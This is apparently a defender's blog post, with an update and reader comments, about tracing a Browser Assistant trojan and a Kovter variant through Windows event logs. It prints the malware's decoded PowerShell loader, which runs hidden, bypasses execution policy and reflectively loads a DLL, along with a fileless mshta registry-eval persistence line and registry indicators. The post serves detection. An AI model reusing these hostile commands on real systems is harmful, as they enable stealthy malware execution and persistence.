Found something kind of interesting that analysts might want to be aware of.
For months, there's this device that kept trying to execute a Powershell payload. I could see it in the logs of a well-known vendor. At first it looks like this because this vendor decided everything should be in caps.
C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -ENCODEDCOMMAND JAB3AD0AJABLAG4ADGA6AEEAUABQAEQAQQBUAEEAKWANAFWAQGBYAG8ADWBZAGUACGAGAEEACWBZAGKACWB0AGEABGB0AFWAJWA7AFSAUGBLAGYABABLAGMADABPAG8ABGAUAEEACWBZAGUABQBIAGWAEQBDADOAOGBMAG8AYQBKACGAWWB
I put in a request for them to allow that field to be upper/lower case. So then I see this:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JAB3AD0AJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAKwAnAFwAQgByAG8AdwBzAGUAcgAgAEEAcwBzAGkAcwB0AGEAbgB0AFwAJwA7AFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWwB
The payload decodes to this:
$w=$env:APPDATA+'\Browser Assistant\';[ReflectionAssembly]::Load([
This vendor truncates the payload. >:(
I Google it - thinking I might get lucky. It's a Browser Assistant Trojan. https://blog.malwarebytes.com/detections/trojan-browserassistant-ps/
Sometimes it's hard to believe something is infected, especially if this AV solution keeps saying that it's blocking it. I kept looking for the encoded command in Powershell logs 4103 and 4104 - no luck.
Found out that If I did this: Get-WinEvent -FilterHashtable @{logname="Security";id="4688";} | Select -Expand Message | ?{$_ -like "*powershell*"} | ?{$_ -like "*Reflection*"}, I found it. It was in clear text! The examples on security blogs show it in it's encoded forms. I've seen it in the logs as encoded text before. Why is this one different?
I assume it was in clear text because when that payload was loaded into memory, it was decoded. The event 4688 in the Security log is for process creation. The process was actually created. It's weird because the AV solution said it blocked it. This has been going on since June, and I finally have proof that there's a problem. I could try to clean it up, because I have the IOCs in that article, but the IOCs change all the time. You'll see that the actual decoded payload doesn't match what's in that article. It loads a specific version of .NET for starters. The actual decoded payload is this:
powershell.exe -WindowStyle Hidden -ExecutionPolicy bypass -c "$env:COMPLUS_version='v4.0.30319';&powershell{$w="$env:APPDATA"+'\Browser Assistant\';[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'Updater.dll'));$i=new-object u.U;$i.ST()}"
I haven't found what keeps starting this. Looks like I'll have to keep looking.
###Update####
Been a while since I touched this blog. I've been so busy with cyber defense, ctfs, holiday hack. Never thought that this would be my job, but it is. Sometimes I feel a little over my head. I wanted to revisit this for a while. I did find out what was causing it to execute over a year ago. The process that kept launching this was a variant of Kovter. https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/kovter-an-evolving-malware-gone-fileless
Found some other indicators and an obfuscated binary in the registry.
"C:\Windows\system32\mshta.exe" "javascript:Bsyy7="qq";eV70=new ActiveXObject("WScript.Shell");oe1OXyOm="S";Vcd8A8=eV70.RegRead("HKCU\\software\\fcscgkz\\flwxqgajf
l");G9MfLbiK="4zxH6zWh";eval(Vcd8A8);ul2pbt5YT="UmUVk8mV";" <--this kept running over and over again.
HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Wallpapers
Name: Images <base64encoded binary>
HKLM:\Software\fcscgkz
lqje: <obfuscated binary> - This isn't base64 encoded. Trust me, you'll know if you see it. It looks random.
flwxqgajfl: <base64 encoded strings><bunch of hex that looks like shell code.>
uzksi: S6xXx9mdNmjlJA==
ppaj: Q/cIl47JZi1rc8ijJL1FKrCPtHaJv7U=
ggxo: E/BWwN7BYJWCwSskHqL/kjk=
boadvfk: FqcLk4zANi4kDWir28Afgte9/ujOKjBjpDNsCg5OyaP7nnOuSgzYVDskh2OyNaD1KtQqcCIosyWWjkLoFIwTMnlSD1c=
fthhhtkk:<base64 encoded binary>
oass: <base64 encoded binary>
3ecf9d7c3f: what looks like an array of decimals. Might be byte code or characters in decimal form.
I would hazard a guess that those keys are probably randomized, so they might not look the same from sample to sample.
I discovered the same malware executing 'from AppData\Local\Facebook\Games\FacebookGameroom.exe
ReplyDeleteAssociated event:
"Facebook Gameroom Browser.exe" --type=gpu-process --no-sandbox --lang=en-US --log-file="C:\Users\xxxxxxx\AppData\Local\Facebook\Games\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/xxxxx (KHTML, like Gecko) Chrome/xxxxx CanvasFrame/xxxxx Safari/xxxxx FacebookCanvasDesktop FBAN/GamesWindowsDesktopApp FBAV/1.22.7235.32722" --gpu-vendor-id=0x8086 --gpu-device-id=0x0152 --gpu-driver-vendor="Intel Corporation" --gpu-driver-version=9.17.10.4459 --gpu-driver-date=5-19-2016 --lang=en-US --log-file="C:\Users\xxxxxxx\AppData\Local\Facebook\Games\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/xxxxx(KHTML, like Gecko) Chrome/xxxxx CanvasFrame/xxxxx Safari/xxxxx FacebookCanvasDesktop FBAN/GamesWindowsDesktopApp FBAV/1.22.7235.32722" --service-request-channel-token=***** --mojo-platform-channel-handle=2400 /prefetch:2
Nice blog. thank you
ReplyDelete